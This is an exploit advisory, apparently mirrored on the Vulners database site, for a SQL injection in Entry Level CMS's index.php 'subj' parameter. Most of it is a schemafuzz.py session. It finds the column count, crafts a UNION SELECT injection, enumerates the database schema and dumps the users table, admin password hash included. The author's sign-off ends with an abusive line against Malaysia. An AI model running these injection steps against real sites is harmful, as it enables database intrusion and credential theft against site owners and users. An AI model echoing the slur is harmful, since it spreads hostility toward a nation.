Vulners
Lucene search
SQL Injection Entry Level Content Management System (EL CMS)
[+] Contact : vir0e5[at]hackermail[dot]com
[+] Group : TECON (The Eye COnference) Indonesia
[+] Site : http://tecon-crew.org
********************************************
[Software Information ]
[+]SOftware : Entry Level Content Management System (EL CMS)
[+]vendor : http://www.entrylevelcms.com/
[+]Vulnerability : SQL Injection
********************************************
[ Vulnerable File ]
http://localhost/website/index.php?subj=4
[demo with schemafuzz.py]
|---------------------------------------------------------------
| rsauron[at]gmail[dot]com v5.0
| 6/2008 schemafuzz.py
| -MySQL v5+ Information_schema Database Enumeration
| -MySQL v4+ Data Extractor
| -MySQL v4+ Table & Column Fuzzer
| Usage: schemafuzz.py [options]
| -h help darkc0de.com
|------------------------------------------------------------
C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol
|------------------------------------------------------------
| rsauron[at]gmail[dot]com v5.0
| 6/2008 schemafuzz.py
| -MySQL v5+ Information_schema Database Enumeration
| -MySQL v4+ Data Extractor
| -MySQL v4+ Table & Column Fuzzer
| Usage: schemafuzz.py [options]
| -h help darkc0de.com
|------------------------------------------------------------
[+] URL:http://localhost/website/index.php?subj=6--
[+] Evasion Used: "+" "--"
[+] 03:36:40
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 0
[+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3
[-] Done!
C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full
|------------------------------------------------------------
| rsauron[at]gmail[dot]com v5.0
| 6/2008 schemafuzz.py
| -MySQL v5+ Information_schema Database Enumeration
| -MySQL v4+ Data Extractor
| -MySQL v4+ Table & Column Fuzzer
| Usage: schemafuzz.py [options]
| -h help darkc0de.com
|------------------------------------------------------------
[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:33:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: vman
User: root@localhost
Version: 5.0.51a
[Database]: elcms_db
[Table: Columns]
[0]pages: id,subject_id,menu_name,position,visible,content
[1]subjects: id,menu_name,position,visible
[2]users: id,username,hashed_password
[-] [05:55:27]
[-] Total URL Requests 17
[-] Done
C:\Python26\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password
|------------------------------------------------------------
| rsauron[at]gmail[dot]com v5.0
| 6/2008 schemafuzz.py
| -MySQL v5+ Information_schema Database Enumeration
| -MySQL v4+ Data Extractor
| -MySQL v4+ Table & Column Fuzzer
| Usage: schemafuzz.py [options]
| -h help darkc0de.com
|------------------------------------------------------------
[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:35:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: vman
User: root@localhost
Version: 5.0.51a
[+] Dumping data from database "vman" Table "users"
[+] Column(s) ['id', 'username', 'hashed_password']
[+] Number of Rows: 1
[0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b8f19f541d436c8:
[-] [05:35:15]
[-] Total URL Requests 3
[-] Done
If you not understand about it
[Option/help this tools]
schemafuzz.py -h
********************************************
-- Thank's to my GOD and Soldier Of Allah
-- Special Thanks
#http://indonesian-cyber.org (as Member)
#http://indonesianhacker.org (as Member)
#http://devilzc0de.org (as Member)
#http://tecon-crew.org (as Member)
#http://u3dcrew.darkbb.com (as Member)
--No Special for me, i'm newbie!! ^^--
kaMtiEz, r3m1ck, mywisdom, kiddies, dewancc, m0z4rtkl1k, bluescreen, xyberdesktop, n0rma4n_gokil, 12i4n, BZ AND YOU!!!
Notice : "boycott malaysian product "
* Fuck to Malaysia <= the truly thief asia
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1